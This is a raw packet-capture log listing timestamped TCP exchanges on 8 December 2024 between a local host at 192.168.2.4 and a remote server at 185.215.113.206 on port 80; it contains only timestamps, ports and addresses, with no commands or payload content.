Dec 8, 2024 19:52:25.266998053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.267656088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.267699957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.267745018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.267787933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.268440962 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.268490076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.268625021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.268698931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.269124031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.269203901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.269248009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.270154953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.270214081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.270320892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.270365953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.271495104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.271548986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.272041082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.272089958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.272737026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.272869110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.272882938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.272905111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.273817062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.273947954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.273967981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.273986101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.275105953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.275157928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.275228977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.275269985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.276319981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.276371002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.276444912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.276501894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.277525902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.277589083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.277625084 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.277681112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.278570890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.278631926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.278660059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.278697014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.279396057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.279447079 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.279560089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.279598951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.280356884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.280412912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.280443907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.280482054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.281066895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.281121016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.281178951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.281219006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.281969070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.282027006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.282067060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.282169104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.282736063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.282788038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.282850027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.282975912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.283443928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.283560038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.283615112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.284239054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.284387112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.284737110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.284790039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.285094023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.285156012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.285178900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.285279989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.285892010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.285943985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.285948992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.286017895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.286734104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.286802053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.286830902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.286873102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.287606001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.287652969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.287739992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.287869930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.288325071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.288399935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.288465977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.288533926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.288966894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.289015055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.289067984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.289113045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.289726019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.289794922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.289828062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.289840937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.290472984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.290518045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.290604115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.290653944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.291234016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.291280985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.291357040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.291471958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.291970968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.292020082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.292048931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.292088985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.292582989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.292593956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.292619944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.292639971 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.293386936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.293431997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.293632030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.293705940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.294128895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.294177055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.294209957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.294306993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.294815063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.294866085 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.294893026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.294926882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.295536041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.295584917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.295629978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.295680046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.296134949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.296186924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.296238899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.296305895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.296771049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.296818018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.296821117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.296857119 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.297382116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.297430038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.297454119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.297492981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.298067093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.298110008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.298172951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.298209906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.298881054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.298923969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.298981905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.299141884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.299747944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.299797058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.299802065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.299830914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.300698996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.300745010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.300807953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.300860882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.301476955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.301531076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.301592112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.301635027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.302479029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.302530050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.302597046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.302664995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.303478956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.303528070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.303570032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.303608894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.304265022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.304308891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.304313898 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.304409027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.305084944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.305128098 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.305151939 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.305187941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.305825949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.305882931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.305926085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.306013107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.306740999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.306782007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.306875944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.306909084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.307545900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.307600021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.307641983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.307715893 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.308398008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.308440924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.454015970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454219103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454313993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.454346895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454511881 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454565048 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.454688072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454699993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.454725981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.454754114 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.455352068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.455518961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.455565929 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.456198931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.456258059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.456306934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.457317114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.457360983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.457377911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.457927942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.457976103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.458071947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.458889008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.458930969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.458945990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.458978891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.459685087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.459825039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.459882021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.460539103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.460621119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.460675955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.461477041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.461524010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.461540937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.462333918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.462379932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.462403059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.463152885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.463202000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.463274956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.463321924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.464045048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.464087009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.464132071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.464883089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.465003014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.465050936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.465713024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.465754986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.465821028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.466726065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.466775894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.466900110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.467580080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.467626095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.467709064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.467756033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.468370914 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.468460083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.468497992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.469238997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.469285965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.469316959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.470103979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.470148087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.470151901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.471087933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.471133947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.471221924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.471263885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.471772909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.471905947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.471947908 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.472676992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.472800970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.472846031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.473570108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.473628998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.473640919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.474392891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.474437952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.474612951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.475344896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.475392103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.475429058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.475469112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.476239920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.476335049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.476386070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.477008104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.477173090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.477217913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.477854967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.477900028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.477921009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.478718042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.478765965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.478866100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.479595900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.479645014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.479665995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.479703903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.480482101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.480643034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.480690002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.481332064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.481447935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.481487036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.482198954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.482243061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.482275009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.483066082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.483112097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.483217955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.483926058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.483968973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.484035969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.484097004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.484783888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.484847069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.484888077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.485635042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.485773087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.485816956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.486536980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.486584902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.486615896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.487381935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.487435102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.487467051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.487505913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.488291025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.488334894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.488385916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.489104986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.489218950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.489260912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.489989042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.490032911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.490068913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.491070032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.491099119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.491125107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.491137028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.492064953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.492149115 CET	80	49748	185.215.113.206	192.168.2.4
